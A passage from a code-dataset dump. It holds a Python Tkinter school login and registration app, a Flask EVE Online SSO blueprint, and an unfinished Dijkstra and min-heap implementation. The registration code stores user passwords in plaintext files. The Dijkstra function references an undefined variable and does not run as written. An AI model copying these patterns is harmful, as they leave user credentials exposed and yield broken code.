finish)\r\n btnfinish.grid(row=1,column=3)\r\n #````````````````````````````````````````````\r\n global text_Input\r\n text_Input=StringVar()\r\n calf=Frame(display,relief=RIDGE,bg=\"#7a2048\")\r\n calf.pack(side=TOP)\r\n caE=Entry(calf,width=55,bg=\"#E9DBDB\",bd=4, font=(\"arial\",12,\"bold\"),justify=RIGHT,textvariable=text_Input)\r\n caE.grid(row=0,column=0,columnspan=4,ipady=3,pady=1)\r\n caE.insert(0,\"0\")\r\n #============calculator buttons===================\r\n global btn7\r\n btn7=Button(calf,text=\"7\",relief=RIDGE,bd=3,width=12,pady=1,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(7))\r\n btn7.grid(row=2,column=0)\r\n btn8=Button(calf,text=\"8\",pady=1,width=12,relief=RIDGE,bd=3,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(8))\r\n btn8.grid(row=2,column=1)\r\n btn9=Button(calf,text=\"9\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(9))\r\n btn9.grid(row=2,column=2)\r\n btnadd=Button(calf,text=\"+\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"),command=button_add)\r\n btnadd.grid(row=2,column=3)\r\n\r\n\r\n btn4=Button(calf,text=\"4\",relief=RIDGE,bd=3,pady=1,fg=\"black\", width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(4))\r\n btn4.grid(row=3,column=0)\r\n btn5=Button(calf,text=\"5\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(5))\r\n btn5.grid(row=3,column=1)\r\n btn6=Button(calf,text=\"6\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(6))\r\n btn6.grid(row=3,column=2)\r\n btnsub=Button(calf,text=\"-\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"),command=button_substract)\r\n btnsub.grid(row=3,column=3)\r\n\r\n\r\n btn1=Button(calf,text=\"1\",pady=1,fg=\"black\",relief=RIDGE,bd=3,bg=\"#E9DBDB\", width=12,font=(\"arial\",15,\"bold\"), command=lambda:button_click(1))\r\n btn1.grid(row=4,column=0)\r\n btn2=Button(calf,text=\"2\",pady=1,fg=\"black\", relief=RIDGE,bd=3,bg=\"#E9DBDB\",width=12,font=(\"arial\",15,\"bold\"), command=lambda:button_click(2))\r\n btn2.grid(row=4,column=1)\r\n btn3=Button(calf,text=\"3\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#E9DBDB\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(3))\r\n btn3.grid(row=4,column=2)\r\n btnmul=Button(calf,text=\"*\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#CEA642\",font=(\"arial\",15,\"bold\"), command=button_multiply)\r\n btnmul.grid(row=4,column=3)\r\n\r\n\r\n btndiv=Button(calf,text=\"/\",pady=1,fg=\"black\",relief=RIDGE,bd=3,width=12,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=button_divide)\r\n btndiv.grid(row=5,column=0)\r\n btnz=Button(calf,text=\"0\",pady=1,fg=\"black\",relief=RIDGE,bd=3,width=12,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(0))\r\n btnz.grid(row=5,column=1)\r\n btne=Button(calf,text=\"=\",width=12,pady=1,relief=RIDGE,bd=3,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"),command=button_equals)\r\n btne.grid(row=5,column=2)\r\n btnclr=Button(calf,text=\"clr\",width=12,pady=1,relief=RIDGE,bd=3,fg=\"black\", bg=\"#CEA642\",font=(\"arial\",15,\"bold\"),command=button_clears)\r\n btnclr.grid(row=5,column=3)\r\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n #regf=Frame(display,relief=RIDGE,bd=4)\r\n #regf.pack(side=BOTTOM)\r\n Reg5.mainloop() \r\n\r\ndef Window4():\r\n Reg4.destroy()\r\n root.withdraw()\r\n global Window4\r\n global Reg6\r\n Reg6=Toplevel()\r\n Reg6.title(\"FORM-MASTER/MISTRESS\")\r\n Reg6.iconbitmap(\"favico.ico\")\r\n Reg6.resizable(width=False, height=False)\r\n Reg6.geometry(\"300x300\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg6.config(bg=\"white\")\r\n Reg6.mainloop()\r\ndef options():\r\n global Reg4\r\n global options\r\n global clicked\r\n global r\r\n global Variable\r\n Reg4=Toplevel(root)\r\n Reg4.title(\"WELCOME\")\r\n Reg4.iconbitmap(\"favico.ico\")\r\n Reg4.resizable(width=False, height=False)\r\n #Reg4.geometry(\"350x150\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg4.config(bg=\"#B0E0E6\")\r\n r = IntVar()\r\n r.get()\r\n rad1=Radiobutton(Reg4, text=\"formmaster/mistress\",bg=\"#B0E0E6\",font=(\"arial\", 8,\"bold\"),variable=r, value=1,command=lambda:(1))\r\n rad2=Radiobutton(Reg4, text=\"subject teacher\",bg=\"#B0E0E6\", font=(\"arial\", 8,\"bold\"),variable=r, value=2,command=lambda:(2))\r\n rad1.pack(anchor=W)\r\n rad2.pack(anchor=W)\r\n btnRAD= Button(Reg4, text=\"next>>>\",bg=\"#B0E0E6\",bd=1,command=lambda: rad3(r.get()))# \r\n btnRAD.pack(anchor=W)\r\n\r\n btncancel= Button(Reg4, text=\"cancel\",bg=\"#B0E0E6\",bd=1,command=cancel)#bg=\"white\", \r\n btncancel.pack(anchor=W)\r\n \r\n\r\n\r\ndef reg3():\r\n Reg2.destroy()\r\n #frame1.config(state='enabled')\r\n txtUsername.configure(state='normal') \r\n txtPassword.configure(state='normal')\r\n \r\n\r\n #========================buuttons=====================================\r\n\r\n btnReg.configure(state='normal')\r\n btnLgn.configure(state='normal')\r\n btnCp.configure(state='normal')\r\n \r\nclock=30 \r\ndef clock1():\r\n global clock\r\n clock=int(clock)-1\r\n my_label.config(text=\"YOU HAVE ATTEMPTD THREE TIME \\n sorry you have to wait \" + str(clock) + \" secs\")\r\n my_label.after(1000, clock1)\r\n my_label.after(30000, reg3)\r\n\r\ntimes = 5\r\ndef loginchecker():\r\n\r\n \r\n username1=username_verify.get()\r\n password1=password_verify.get()\r\n\r\n\r\n list_of_files=os.listdir('C:/Users/codei/Documents/ndaca')\r\n def submit():\r\n global my2\r\n global Reg2\r\n global my_label\r\n global times\r\n times=int(times)-1\r\n if username1 in list_of_files:\r\n file1 = open(username1, 'r')\r\n verify =file1.read().splitlines()\r\n \r\n if password1 in verify:\r\n response=messagebox.showinfo(\"LOGIN SUCESSFUL\", \"you are going to the main page\")\r\n if response==\"ok\":\r\n options()\r\n elif times==2:\r\n #frame1.disabled()\r\n Reg2=Toplevel(root)\r\n Reg2.title(\"please wait\")\r\n Reg2.iconbitmap(\"favico.ico\")\r\n Reg2.resizable(width=False, height=False)\r\n Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg2.config(bg=\"white\")\r\n #Reg2.geometry(\"250x80+0+0\")\r\n txtUsername.configure(state='disabled')\r\n \r\n \r\n txtPassword.configure(state='disabled')\r\n \r\n\r\n #========================buuttons=====================================\r\n\r\n btnReg.configure(state='disabled')\r\n btnLgn.configure(state='disabled')\r\n btnCp.configure(state='disabled')\r\n \r\n my2= Frame(Reg2, relief=RIDGE,bg=\"white\",bd=3)\r\n my_label=Label(my2, text=\"\", bg=\"white\")\r\n clock1()\r\n my_label.pack(pady=20)\r\n my2.pack()\r\n \r\n \r\n\r\n \r\n\r\n \r\n elif times==0:\r\n response=messagebox.askokcancel(\"OOPS\", 'sorry you have exceeded the number of trials \\n would you like to register')\r\n if response==1:\r\n Window2()\r\n else:\r\n root.destroy()\r\n else:\r\n response=messagebox.askokcancel('OOPS', 'you have ' + str(times) + \" attempts\" )\r\n if response==1:\r\n txtUsername.delete(0,'end')\r\n txtPassword.delete(0, 'end')\r\n else:\r\n root.destroy()\r\n\r\n\r\n submit() \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\ndef Window1():\r\n global btnReg\r\n global btnLgn\r\n global btnCp\r\n global frame1\r\n global root\r\n root = Tk()\r\n global username_verify\r\n global password_verify\r\n global txtUsername\r\n global txtPassword\r\n\r\n \r\n #RegCP.destroy()\r\n username_verify= StringVar()\r\n password_verify=StringVar()\r\n root.title(\"login screen\")\r\n root.iconbitmap(\"favico.ico\")\r\n root.resizable(width=False, height=False)\r\n root.config(bg=\"white\")\r\n #root.wm_attributes(\"-topmost\", True)\r\n #root.wm_attributes(\"-disabled\", True)\r\n #root.wm_attributes(\"-transparentcolor\", \"white\")\r\n #====================================================================\r\n\r\n \r\n frame1=Frame(root, bg =\"white\", relief=RAISED)\r\n frame1.pack()\r\n\r\n logo2 = ImageTk.PhotoImage(Image.open(\"ndass2.jpg\"))\r\n\r\n\r\n\r\n lblTitle=Label(frame1, image=logo2)\r\n lblTitle.grid(row=0,column=0,columnspan=3, pady =20)\r\n \r\n \r\n \r\n #==========================================================\r\n Loginframe1= LabelFrame(frame1,width=2000,height=400,pady=5, font=(\"arial\", 11,\"bold\"), relief=RIDGE, bg=\"#9EF489\", bd=2)\r\n Loginframe1.grid(row=1,column=0)\r\n\r\n Loginframe2= LabelFrame(frame1,width=3000,height=600,pady=5, font=(\"arial\", 11,\"bold\"), relief=RIDGE, bg=\"#9EF489\", bd=2)\r\n Loginframe2.grid(row=2,column=0)\r\n #===================label and entry===============================\r\n\r\n lblUsername = Label(Loginframe1,width=31, text=\"username* \", bg=\"#9EF489\",font=(\"helvetica\", 10,'bold'))\r\n lblUsername.grid(row=0,column=0)\r\n txtUsername = Entry(Loginframe1, relief =RIDGE, bd=3, justify=\"center\",font=(\"helvetica\", 10,'bold'),textvariable =username_verify)\r\n txtUsername.grid(row=1,column=0)\r\n lblPassword = Label(Loginframe1, text=\"password* \",width=31,justify=\"center\", bg=\"#9EF489\", font=(\"helvetica\", 10, 'bold'))\r\n lblPassword.grid(row=2,column=0)\r\n txtPassword = Entry(Loginframe1,width=23, justify=\"center\", show=\"*\", textvariable =password_verify)\r\n txtPassword.grid(row=3,column=0)\r\n\r\n #========================buuttons=====================================\r\n \r\n btnReg = Button(Loginframe2, text=\"register\",relief=RAISED, bg='#EE1D99',padx=10,pady=10,font=(\"Arial Rounded MT Bold\",8),command= Window2)\r\n btnReg.grid(row=0,column=0)\r\n btnLgn = Button(Loginframe2, text=\"login\",relief=RAISED, bg='yellow',font=(\"Arial Rounded MT Bold\",8),padx=10,pady=10,command = loginchecker)\r\n #btnLgn.bind(\"\", loginchecker)\r\n btnLgn.grid(row=0,column=1)\r\n btnCp= Button(Loginframe2, text=\"forget password?\",relief=RAISED,font=(\"Arial Rounded MT Bold\",8),padx=9,pady=9, bg='#B61DEE', command=forgetpass)\r\n btnCp.grid(row=0,column=2)\r\n label4 = Label(Loginframe2, width=31, text=\"login screen copyright ©\", bg=\"#9EF489\", font=(\"helvetica\", 10))\r\n label4.grid(row=4,column=0,columnspan=3)\r\n \r\n #root.withdraw()\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\ndef ok():\r\n response=messagebox.askokcancel(\"confirm\", \"do you want to continue\")\r\n if response==1:\r\n submitReg()\r\n\r\n\r\n \r\n\r\ndef submitReg():\r\n #===============================\r\n #i=info\r\n first_nameI=first_name.get()\r\n last_nameI=last_name.get()\r\n DOBI=click1.get()\r\n DOBI1=click2.get()\r\n DOBI2=click3.get()\r\n SOGi=click4.get()\r\n Genderi=click5.get()\r\n addressi= address.get()\r\n phone_numberi=phone_number.get()\r\n usernamei=username.get()\r\n passwordi=password.get()\r\n confirmed_passwordi=confirmed_password.get()\r\n\r\n \r\n \r\n \r\n try:\r\n if len(first_nameI)==0 or first_nameI.isdigit():\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\":\r\n FNentry.delete(0, 'end')\r\n if len(last_nameI)==0 or last_nameI.isdigit():\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\":\r\n LNentry.delete(0, 'end')\r\n \r\n \r\n \r\n \r\n if len(addressi)==0:\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\":\r\n ADDentry.delete(0, 'end')\r\n\r\n if len(phone_numberi)==0 or phone_numberi.isalpha():\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\": \r\n PNentry.delete(0, 'end')\r\n\r\n if len(usernamei)==0 or usernamei.isdigit():\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\": \r\n UNentry.delete(0, 'end')\r\n \r\n if confirmed_passwordi == passwordi and re.search(\"[a-z]\", passwordi) and re.search(\"[a-z]\", confirmed_passwordi) and re.search(\"[A-Z]\",passwordi) and re.search(\"[A-Z]\", confirmed_passwordi) and confirmed_passwordi.isalnum and passwordi.isalnum() and len(confirmed_passwordi)>8 and len(passwordi) >8:\r\n file= open(usernamei, \"w\")\r\n file.write(usernamei + \"\\n\")\r\n file.write(confirmed_passwordi + \"\\n\")\r\n file.write(phone_numberi + \"\\n\") \r\n file.write(first_nameI + \"\\n\")\r\n file.write(last_nameI + \"\\n\")\r\n file.write(addressi + \"\\n\")\r\n file.write(Genderi + \"\\n\")\r\n file.write(SOGi + \"\\n\")\r\n file.write(DOBI + \"\\n\")\r\n file.write(DOBI1 + \"\\n\")\r\n file.write(DOBI2 + \"\\n\")\r\n \r\n file.close() \r\n Reg.destroy()\r\n \r\n \r\n \r\n\r\n\r\n else:\r\n response=messagebox.showinfo(\"HELP\", \"invalid input\")\r\n if response ==\"ok\":\r\n Pentry.delete(0, 'end')\r\n FCentry.delete(0, 'end')\r\n \r\n\r\n \r\n except FileNotFoundError and FileExistsError:\r\n response=messagebox.askokcancel(\"HELP\", \"do you want to quit the registeration process\")\r\n if response ==\"ok\":\r\n Reg.destroy()\r\n else:\r\n messagebox.showinfo(\"RETURN\", \"you are going back to the registeration page\")\r\n\r\n \r\n\r\n\r\n\r\n\r\ndef Window2():\r\n global Reg\r\n global Window2\r\n global frame2\r\n global framer\r\n\r\n global first_name\r\n global last_name\r\n global DOB\r\n global SOG\r\n global Gender\r\n global address\r\n global phone_number\r\n global username\r\n global password\r\n global confirmed_password\r\n\r\n #=========global entry============\r\n global label5\r\n global FNentry\r\n global LNentry\r\n global ADDentry\r\n global click1\r\n global click2\r\n global click3\r\n global click4\r\n global click5\r\n global PNentry\r\n global UNentry\r\n global Pentry\r\n global FCentry\r\n global lblTitle\r\n\r\n root.deiconify()\r\n\r\n first_name=StringVar()\r\n last_name=StringVar()\r\n DOB= StringVar()\r\n SOG=StringVar()\r\n Gender=StringVar()\r\n address=StringVar()\r\n phone_number=StringVar()\r\n username= StringVar()\r\n password=StringVar()\r\n confirmed_password=StringVar()\r\n\r\n Reg=Toplevel()\r\n Reg.title(\"registeration page\")\r\n Reg.iconbitmap(\"favico.ico\")\r\n Reg.geometry(\"1000x450+100+50\")\r\n bgf= ImageTk.PhotoImage(Image.open(\"bgfor1.jpg\"))\r\n lblTitle=Label(Reg, image=bgf)\r\n lblTitle.place(x=0,y=0, relwidth=1,relheight=1)\r\n\r\n Reg.resizable(width=False, height=False)\r\n Reg.config(bg=\"brown\")\r\n\r\n frame4=Frame(Reg, bg =\"#DBDDDA\", relief=FLAT,bd=2)\r\n frame4.place(x=150,y=100, width=689,height=270)\r\n\r\n #============combobox details for states==========='\r\n options=['abia',\"adamawa\",\"akwa-ibom\", 'anambra', 'Bauchi','Bayelsa','Benue','Borno','Cross River','Delta',\r\n 'Ebonyi','Edo','Ekiti','Enugu','Gombe','Imo','Jigawa','Kaduna','Kano','Katsina','Kebbi','Kogi','Kwara','Lagos','Nasarawa',\r\n 'Niger','Ogun','Ondo','Osun','Oyo','Plateau','Rivers','Sokoto','Taraba','Yobe','Zamfara','F.C.T']\r\n options1=['male','female','others']\r\n options2=['1','2','3','4','5','6','7','8','9','10','11','12','13','12','12','10','17','18','19','20','21','22','23','24','25','26','27','28',\r\n '29','30','31']\r\n options3=['January','February','March','April','May','June','July','August','September', 'October','November','December']\r\n #options4=['Monday','Tuesday','Wednessday','Thursday','Friday','Sarturday']\r\n options5=['1960','1961','1962','1963','1964','1965','1966','1967','1968','1969','1970','1971','1972','1973','1974',\r\n '1975', '1976','1977','1978','1979','1980','1981','1982','1983','1984','1984','1985','1986','1987','1988','1989','1990',\r\n '1991','1992','1992','1993','1994','1995','1996','1997','1998']\r\n\r\n\r\n #=============registerion details========\r\n framet=LabelFrame(frame4, bg =\"white\", relief=RIDGE, bd =2)\r\n framet.grid(row=0,column=0)\r\n frame2=LabelFrame(framet, bg =\"#DBDDDA\",width=200, height=2000, relief=FLAT, bd =1)\r\n frame2.grid(row=0,column=0)\r\n framer=LabelFrame(framet, bg =\"#DBDDDA\",width=600, height=150, relief=FLAT, bd =1)\r\n framer.grid(row=0,column=1)\r\n frameb=LabelFrame(Reg, bg =\"#20165B\",width=30, height=20, relief=FLAT, bd =1)\r\n frameb.place(x=430,y=350, width=130,height=58)\r\n \r\n framey=LabelFrame(frameb, bg =\"white\", relief=RIDGE, bd =2)\r\n framey.pack()\r\n \r\n #===============================================================================\r\n label5=Label(frame2, text=\"first name\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n label5.grid(row=1,padx=1,sticky=W)\r\n FNentry =Entry(frame2, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable= first_name)\r\n FNentry.grid(row= 2, padx=1,ipady=3)\r\n\r\n LNlabel=Label(frame2, text=\"last name\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n LNlabel.grid(row= 3, padx=1)\r\n LNentry =Entry(frame2, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable=last_name)\r\n LNentry.grid(row= 5,padx=1,ipady=3)\r\n #=========================================================\r\n click1=StringVar()\r\n\r\n DOBbox= ttk.Combobox(frame2, value=options2,width=2)\r\n DOBbox.current(0)\r\n DOBbox.place(x=75,y=128)\r\n DOBlabel=Label(frame2, text=\"date of birth\", bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n DOBlabel.grid(row= 6, padx=1)\r\n DOBlabel=Label(frame2, text=\" \", bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n DOBlabel.grid(row= 8, padx=1)\r\n #========\r\n click2 =StringVar()\r\n DOBbox1=ttk.Combobox(frame2,value=options3,width=10)\r\n DOBbox1.current(0)\r\n DOBbox1.place(x=120,y=128)\r\n\r\n #======\r\n click3 =StringVar()\r\n DOBbox2=ttk.Combobox(frame2,value=options5, width=4)\r\n DOBbox2.current(0)\r\n DOBbox2.place(x=210,y=128)\r\n #DOBentry =Entry(frame2, ef= RIDGE, bd=3, width=20, justify= CENTER, textvariable=DOB)\r\n #DOBentry.grid(row= 8, column=0)\r\n\r\n #=========================================================\r\n SOGlabel=Label(frame2, text=\"state of origin\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n SOGlabel.grid(row= 9, column=0)\r\n #SOGentry =Entry(frame2, relief= RIDGE, bd=3, width=20, justify= CENTER, textvariable=SOG)\r\n #SOGentry.grid(row= 11, column=0)\r\n click4 =StringVar()\r\n DOBbox3=ttk.Combobox(frame2,value=options, width=25)\r\n DOBbox3.current(0)\r\n DOBbox3.grid(row=11, column=0)\r\n #===========================================================================\r\n\r\n Glabel=Label(frame2, text=\"Gender\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n Glabel.grid(row= 12, column=0)\r\n\r\n\r\n click5 =StringVar()\r\n DOBbox4=ttk.Combobox(frame2,value=options1, width=25)\r\n DOBbox4.current(0)\r\n DOBbox4.grid(row=13, column=0,pady=5)\r\n\r\n #======================================================\r\n #Gentry =Entry(frame2, relief= RIDGE, bd=3, width=20, justify= CENTER,textvariable=Gender)\r\n #Gentry.grid(row= 12, column=0)\r\n\r\n #============labelframe2====================================================================\r\n ADDlabel=Label(framer, text=\"address\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n ADDlabel.grid(row= 12, column=0)\r\n ADDentry =Entry(framer, relief= GROOVE, bd=1, bg='white', width=30, justify= CENTER, textvariable=address)\r\n ADDentry.grid(row= 17, column=0,ipady=3)\r\n PNlabel=Label(framer, text=\"phone number\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n PNlabel.grid(row= 18, column=0)\r\n PNentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER,textvariable=phone_number)\r\n PNentry.grid(row=19, column=0,ipady=3)\r\n UNlabel=Label(framer, text=\"username\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n UNlabel.grid(row= 20, column=0)\r\n UNentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, textvariable=username)\r\n UNentry.grid(row= 23, column=0,ipady=3)\r\n Plabel=Label(framer, text=\"password\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n Plabel.grid(row= 24, column=0)\r\n Pentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, show=\"*\", textvariable=password)\r\n Pentry.grid(row= 26, column=0,ipady=3)\r\n FClabel=Label(framer, text=\"confirmed password\", width=30, bg='#DBDDDA',font=(\"Arial Rounded MT Bold\",13))\r\n FClabel.grid(row= 27, column=0)\r\n FCentry =Entry(framer, relief= GROOVE,bg='white', bd=1, width=30, justify= CENTER, show=\"*\", textvariable=confirmed_password)\r\n FCentry.grid(row= 29, column=0,pady=3,ipady=2)\r\n \r\n #==================buttons===================================\r\n\r\n bitt1=Button(framey, width=20, text=\"submit\",bg=\"#20165B\", fg=\"#EC9787\",relief=FLAT,font=(\"Arial Rounded MT Bold\",25),command=submitReg)\r\n bitt1.pack()#grid(row= 30, column=0)\r\n\r\n Reg.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\nWindow1()\r\n ","sub_path":"ca2.py","file_name":"ca2.py","file_ext":"py","file_size_in_byte":47921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632979213","text":"# -*- encoding: utf-8 -*-\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import request\nfrom flask import url_for\nfrom flask import flash\nfrom urlparse import urlparse\nfrom urlparse import urljoin\nfrom flask_login import current_user\nfrom flask_login import login_required\nfrom flask_login import logout_user\nfrom flask_oauthlib.client import OAuthException\n\nfrom lazyblacksmith.extension.esipy import esisecurity\nfrom lazyblacksmith.extension.oauth import eve_oauth\nfrom lazyblacksmith.models import db\nfrom lazyblacksmith.utils.login import check_login_user\n\nsso = Blueprint('sso', __name__)\n\n\n@sso.route('/login')\ndef login():\n return eve_oauth.authorize(\n callback=url_for(\n 'sso.callback',\n next='home.index',\n _external=True\n ),\n )\n\n\n@sso.route('/add_alt')\ndef add_alt():\n return eve_oauth.authorize(\n callback=url_for(\n 'sso.callback',\n next='account.index',\n _external=True\n ),\n )\n\n\n@sso.route('/logout')\n@login_required\ndef logout():\n logout_user()\n flash(\"You have been logged out successfully.\", 'info')\n return redirect(url_for(\"home.index\"))\n\n\n@sso.route('/callback')\ndef callback():\n auth_response = eve_oauth.authorized_response()\n if auth_response is None:\n return 'Access denied: reason=%s error=%s' % (\n request.args['error_reason'],\n request.args['error_description']\n ), 403\n\n if isinstance(auth_response, OAuthException):\n return 'Error while validating your authentification', 403\n\n esisecurity.update_token(auth_response)\n cdata = esisecurity.verify()\n\n if current_user.is_authenticated:\n check_login_user(cdata, auth_response, current_user)\n else:\n check_login_user(cdata, auth_response)\n\n # redirect\n try:\n return redirect(url_for(request.args.get('next')))\n except:\n return redirect(url_for(\"home.index\"))\n\n\n@eve_oauth.tokengetter\ndef eve_oauth_tokengetter(token=None):\n if current_user.is_authenticated:\n esisecurity.update_token(current_user.get_sso_data())\n if esisecurity.is_token_expired(offset=60):\n token_response = esisecurity.refresh()\n current_user.update_token(token_response)\n db.session.commit()\n return (current_user.access_token,)\n return None\n","sub_path":"lazyblacksmith/views/user/sso.py","file_name":"sso.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"115511565","text":"import heapq\n\ndef dijkstra(graphEdges, start, goal):\n # graphEdges: List[List[List[destination, distance]]\n # list of outgoing edges for each node in a graph\n # every edge is [destination, distance]\n\n\n # tent_distances = {node: float('inf') for node in range(num_nodes)}\n num_nodes = len(graphEdges)\n\n visited = {node: False for node in range(num_nodes)}\n visited[start] = True\n\n dist_heap = MinHeap([(start, 0)])\n\n while not visited[goal]:\n curr_node = dist_heap.remove()\n\n for outgoing_edge in graphEdges[curr_node]:\n [neighbor, distance_from_curr] = outgoing_edge\n if not visited[neighbor]: # if the destination node is not already visited\n calculated_dist = tent_distances[curr_node] + distance_from_curr\n\n if calculated_dist < tent_distances[neighbor]:\n tent_distances[neighbor] = calculated_dist\n\n\ndef main():\n # Adjacency list representation of a graph\n graph = {\n \"A\": [\"B\", \"C\"],\n \"B\": [],\n \"C\": [\"B\", \"D\"],\n \"D\": []\n }\n\n dijkstra(graph, start=\"A\", goal=\"D\")\n\n\nmain()\n\n\n\n\n\n\n\n\n\n# Do not edit the class below except for the buildHeap,\n# siftDown, siftUp, peek, remove, and insert methods.\n# Feel free to add new properties and methods to the class.\n\n# static methods\n# O(1) time, O(1) space\ndef swap(i, j, heap):\n heap[i], heap[j] = heap[j], heap[i]\nclass MinHeap:\n def __init__(self, array):\n # Do not edit the line below.\n self.heap = self.__buildHeap(array)\n\n \"\"\"\n INTERNAL API\n \"\"\"\n # Implementation using siftDown(), O(n) time, O(1) space\n def __buildHeap(self, array):\n self.heap = array\n\n n = self.getLength()\n # index of last element - 1 = (n - 1) - 1 = n - 2\n parentIndex = (n - 2) // 2\n # [0, parentIndex] -- all nodes are parents from this moment\n for i in reversed(range(parentIndex + 1)):\n self.__siftDown(i)\n\n return self.heap\n\n # implementation using siftUp(), O(n log(n)) time | O(1) space since all actions are in-place\n # def __buildHeap(self, array):\n # # Write your code here.\n # self.heap = array\n #\n # for i in range(1, len(array)):\n # self.__siftUp(i)\n #\n # return self.heap\n\n # O(log(n)) time | O(1) space\n # def __siftDown(self, index):\n # # Write your code here.\n # # TODO do we assume that the heap property for all other nodes holds when calling this method?\n # if index >= 0:\n # n = self.getLength()\n #\n # while index < n - 1:\n # c1_idx = 2 * index + 1 # child 1 index\n # c2_idx = 2 * index + 2 # child 2 index\n # child_indices = [c1_idx, c2_idx]\n #\n # c1 = self.heap[c1_idx] if c1_idx < n else float('inf') # child 1's value (if applicable)\n # c2 = self.heap[c2_idx] if c2_idx < n else float('inf') # child 2's value (if applicable)\n # children = [c1, c2]\n #\n # if self.heap[index] <= min(children):\n # break\n # else:\n # min_child_idx = child_indices[0 if c1 < c2 else 1]\n # swap(index, min_child_idx, self.heap)\n # index = min_child_idx\n #\n # return index\n #\n #\n\n # O(log(n)) time | O(1) space\n def __siftDown(self, index):\n # Write your code here.\n # TODO do we assume that the heap property for all other nodes holds when calling this method?\n # This check is to basically remove the malicious indices right away\n if index >= 0:\n n = self.getLength()\n\n c1_idx = 2 * index + 1 # child 1 index\n\n while c1_idx < n:\n c2_idx = c1_idx + 1 # child 2 index = 2 * index + 2\n\n min_child_idx = c1_idx if (c2_idx >= n or self.heap[c1_idx] < self.heap[c2_idx]) else c2_idx\n\n if self.heap[index] <= self.heap[min_child_idx]:\n break # break the loop if already in the right position\n else:\n swap(index, min_child_idx, self.heap)\n index = min_child_idx\n c1_idx = 2 * index + 1\n\n return index\n\n # O(log(n)) time | O(1) space\n def __siftUp(self, index):\n # Write your code here.\n if 0 < index < self.getLength():\n parentIndex = (index - 1) // 2\n\n while index > 0 and self.heap[parentIndex] > self.heap[index]:\n swap(parentIndex, index, self.heap)\n index = parentIndex\n parentIndex = (index - 1) // 2\n\n \"\"\"\n EXTERNAL API\n \"\"\"\n # O(1) time | O(1) space\n def peek(self):\n # Write your code here.\n if self.heap is None or self.heap == []:\n return None\n else:\n return self.heap[0]\n\n # O(log(n)) time, O(1) time\n def remove(self):\n # Write your code here.\n n = self.getLength()\n # put the current min to the last rightmost position at the deepest level of the heap\n swap(0, n - 1, self.heap)\n # get the last element, which now is the previous root of the heap\n removed_min = self.heap.pop()\n # put the element to the proper place\n self.__siftDown(0)\n # return the value we removed\n return removed_min\n\n # O(log(n)) | O(1) time\n def insert(self, value):\n # Write your code here.\n self.heap.append(value) # append new value at the end\n n = self.getLength() # updated length of the heap array\n self.__siftUp(n - 1) # sift up the newly inserted last element to appropriate position\n\n # My helper methods\n # O(1) time | O(1) space\n def getLength(self):\n return 